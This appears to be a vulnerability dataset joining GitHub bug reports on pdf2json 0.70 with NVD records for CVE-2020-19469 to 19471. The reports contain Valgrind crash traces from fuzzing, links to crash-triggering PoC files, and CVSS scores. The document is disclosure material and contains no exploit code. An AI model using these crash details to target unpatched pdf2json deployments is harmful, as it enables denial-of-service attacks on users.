Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function EmbedStream::getChar (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_npd_EmbedStream::getChar Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ==23888== Memcheck, a memory error detector ==23888== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==23888== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==23888== Command: ./pdf2json ./PoC_npd_EmbedStream::getChar /dev/null ==23888== Error: May not be a PDF file (continuing anyway) Error: PDF file is damaged - attempting to reconstruct xref table... Error (15671): Dictionary key must be a name object Error (15674): Dictionary key must be a name object Error (1930): Dictionary key must be a name object Error (1933): Dictionary key must be a name object Error (1935): Dictionary key must be a name object Error (1937): Dictionary key must be a name object Error (1940): Dictionary key must be a name object Error (3436): Illegal character ')' Error: Unterminated string Error: Bad image parameters ==23888== Invalid read of size 8 ==23888== at 0x42ECFA: EmbedStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x466405: Gfx::opBeginImage(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x40269A: main (pdf2json.cc:275) ==23888== Address 0x0 is not stack'd, malloc'd or (recently) free'd ==23888== ==23888== ==23888== Process terminating with default action of signal 11 (SIGSEGV) ==23888== Access not within mapped region at address 0x0 ==23888== at 0x42ECFA: EmbedStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x466405: Gfx::opBeginImage(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23888== by 0x40269A: main (pdf2json.cc:275) ==23888== If you believe this happened as a result of a stack ==23888== overflow in your program's main thread (unlikely but ==23888== possible), you can try to increase the size of the ==23888== main thread stack using the --main-stacksize= flag. ==23888== The main thread stack size used in this run was 8388608. ==23888== ==23888== HEAP SUMMARY: ==23888== in use at exit: 212,135 bytes in 1,754 blocks ==23888== total heap usage: 1,929 allocs, 175 frees, 301,634 bytes allocated ==23888== ==23888== LEAK SUMMARY: ==23888== definitely lost: 16 bytes in 1 blocks ==23888== indirectly lost: 8 bytes in 1 blocks ==23888== possibly lost: 0 bytes in 0 blocks ==23888== still reachable: 212,111 bytes in 1,752 blocks ==23888== suppressed: 0 bytes in 0 blocks ==23888== Rerun with --leak-check=full to see details of leaked memory ==23888== ==23888== For counts of detected and suppressed errors, rerun with: -v ==23888== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV (NULL pointer dereference) on EmbedStream::getChar
https://api.github.com/repos/flexpaper/pdf2json/issues/29/comments
0
2019-05-28T05:57:15Z
2019-05-29T17:39:46Z
https://github.com/flexpaper/pdf2json/issues/29
449,076,890
29
2,217
CVE-2020-19469
2021-07-21T18:15:08.677
An issue has been found in function DCTStream::reset in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid write of size 8 .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/30" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/flexpaper/pdf2json/issues/30
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to an invalid write on the function DCTStream::reset (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_segv_DCTStream::reset Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ==5144== Memcheck, a memory error detector ==5144== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==5144== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==5144== Command: ./pdf2json ./PoC_segv_DCTStream::reset /dev/null ==5144== Error (13145): Illegal character ')' Error: PDF file is damaged - attempting to reconstruct xref table... Error (7397): Dictionary key must be a name object Error (7407): Dictionary key must be a name object Error (7408): Illegal character '>' Error (7408): Dictionary key must be a name object Error (7416): Dictionary key must be a name object Error (7422): Dictionary key must be a name object Error (7905): Dictionary key must be a name object Error (7955): Dictionary key must be a name object Error (7965): Dictionary key must be a name object Error (7972): Dictionary key must be a name object Error (7974): Dictionary key must be a name object Error (7976): Dictionary key must be a name object Error (7980): Dictionary key must be a name object Error (7985): Dictionary key must be a name object Error (7992): Dictionary key must be a name object Error (7995): Dictionary key must be a name object Error (7997): Dictionary key must be a name object Error (8001): Dictionary key must be a name object Error (8012): Dictionary key must be a name object Error (8024): Dictionary key must be a name object Error (8028): Dictionary key must be a name object Error (8031): Dictionary key must be a name object Error (8039): Dictionary key must be a name object ==5144== Invalid write of size 8 ==5144== at 0x432D2D: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x40269A: main (pdf2json.cc:275) ==5144== Address 0x5b1b218 is 0 bytes after a block of size 4,584 alloc'd ==5144== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==5144== by 0x42CF21: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42C777: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x40269A: main (pdf2json.cc:275) ==5144== ==5144== Conditional jump or move depends on uninitialised value(s) ==5144== at 0x436A29: DCTStream::readHuffSym(DCTHuffTable*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x434B49: DCTStream::readDataUnit(DCTHuffTable*, DCTHuffTable*, int*, int*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x4335CF: DCTStream::readMCURow() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x432FB6: DCTStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x487A83: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x4890DF: Parser::Parser(XRef*, Lexer*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x4542F8: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== Error (8504): Bad Huffman code in DCT stream ==5144== Use of uninitialised value of size 8 ==5144== at 0x41ACFE: GfxState::~GfxState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x41C839: GfxState::restore() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x467BEB: Gfx::restoreState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A5AA: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x40269A: main (pdf2json.cc:275) ==5144== ==5144== Invalid read of size 8 ==5144== at 0x41ACFE: GfxState::~GfxState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x41C839: GfxState::restore() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x467BEB: Gfx::restoreState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A5AA: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x40269A: main (pdf2json.cc:275) ==5144== Address 0x8 is not stack'd, malloc'd or (recently) free'd ==5144== ==5144== ==5144== Process terminating with default action of signal 11 (SIGSEGV) ==5144== Access not within mapped region at address 0x8 ==5144== at 0x41ACFE: GfxState::~GfxState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x41C839: GfxState::restore() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x467BEB: Gfx::restoreState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A5AA: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==5144== by 0x40269A: main (pdf2json.cc:275) ==5144== If you believe this happened as a result of a stack ==5144== overflow in your program's main thread (unlikely but ==5144== possible), you can try to increase the size of the ==5144== main thread stack using the --main-stacksize= flag. ==5144== The main thread stack size used in this run was 8388608. ==5144== ==5144== HEAP SUMMARY: ==5144== in use at exit: 246,401 bytes in 1,945 blocks ==5144== total heap usage: 2,354 allocs, 409 frees, 378,948 bytes allocated ==5144== ==5144== LEAK SUMMARY: ==5144== definitely lost: 18,992 bytes in 161 blocks ==5144== indirectly lost: 8 bytes in 1 blocks ==5144== possibly lost: 0 bytes in 0 blocks ==5144== still reachable: 227,401 bytes in 1,783 blocks ==5144== suppressed: 0 bytes in 0 blocks ==5144== Rerun with --leak-check=full to see details of leaked memory ==5144== ==5144== For counts of detected and suppressed errors, rerun with: -v ==5144== Use --track-origins=yes to see where uninitialised values come from ==5144== ERROR SUMMARY: 27 errors from 4 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV on DCTStream::reset
https://api.github.com/repos/flexpaper/pdf2json/issues/30/comments
0
2019-05-28T06:47:45Z
2019-05-29T17:39:34Z
https://github.com/flexpaper/pdf2json/issues/30
449,091,164
30
2,218
CVE-2020-19470
2021-07-21T18:15:08.710
An issue has been found in function DCTStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a NULL pointer dereference (invalid read of size 1) .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/31" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/flexpaper/pdf2json/issues/31
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function DCTStream::getChar (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_npd_DCTStream::getChar ~~~ valgrind pdf2json $PoC /dev/null ==20313== Memcheck, a memory error detector ==20313== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==20313== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==20313== Command: ./pdf2json PoC_npd_DCTStream::getChar /dev/null ==20313== Error (13143): Badly formatted number Error: PDF file is damaged - attempting to reconstruct xref table... Error (13759): Illegal character '>' Error (7369): Dictionary key must be a name object Error (7379): Dictionary key must be a name object Error (7380): Illegal character '>' Error (7380): Dictionary key must be a name object Error (7388): Dictionary key must be a name object Error (7394): Dictionary key must be a name object Error (7853): Dictionary key must be a name object Error (7903): Dictionary key must be a name object Error (7913): Dictionary key must be a name object Error (7920): Dictionary key must be a name object Error (7922): Dictionary key must be a name object Error (7924): Dictionary key must be a name object Error (7928): Dictionary key must be a name object Error (7933): Dictionary key must be a name object Error (7940): Dictionary key must be a name object Error (7943): Dictionary key must be a name object Error (7945): Dictionary key must be a name object Error (7949): Dictionary key must be a name object Error (7960): Dictionary key must be a name object Error (7972): Dictionary key must be a name object Error (7976): Dictionary key must be a name object Error (7979): Dictionary key must be a name object Error (7987): Dictionary key must be a name object ==20313== Invalid read of size 1 ==20313== at 0x433044: DCTStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x487A83: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x4890DF: Parser::Parser(XRef*, Lexer*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x4542F8: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x40269A: main (pdf2json.cc:275) ==20313== Address 0x0 is not stack'd, malloc'd or (recently) free'd ==20313== ==20313== ==20313== Process terminating with default action of signal 11 (SIGSEGV) ==20313== Access not within mapped region at address 0x0 ==20313== at 0x433044: DCTStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x487A83: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x4890DF: Parser::Parser(XRef*, Lexer*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x4542F8: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==20313== by 0x40269A: main (pdf2json.cc:275) ==20313== If you believe this happened as a result of a stack ==20313== overflow in your program's main thread (unlikely but ==20313== possible), you can try to increase the size of the ==20313== main thread stack using the --main-stacksize= flag. ==20313== The main thread stack size used in this run was 8388608. ==20313== ==20313== HEAP SUMMARY: ==20313== in use at exit: 225,178 bytes in 1,772 blocks ==20313== total heap usage: 2,047 allocs, 275 frees, 341,335 bytes allocated ==20313== ==20313== LEAK SUMMARY: ==20313== definitely lost: 16 bytes in 1 blocks ==20313== indirectly lost: 8 bytes in 1 blocks ==20313== possibly lost: 0 bytes in 0 blocks ==20313== still reachable: 225,154 bytes in 1,770 blocks ==20313== suppressed: 0 bytes in 0 blocks ==20313== Rerun with --leak-check=full to see details of leaked memory ==20313== ==20313== For counts of detected and suppressed errors, rerun with: -v ==20313== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV (NULL pointer dereference) on DCTStream::getChar
https://api.github.com/repos/flexpaper/pdf2json/issues/31/comments
0
2019-05-28T08:53:18Z
2019-05-29T17:39:20Z
https://github.com/flexpaper/pdf2json/issues/31
449,144,277
31
2,219
CVE-2020-19471
2021-07-21T18:15:08.747
An issue has been found in function DCTStream::decodeImage in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 4 .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/32" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/flexpaper/pdf2json/issues/32
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
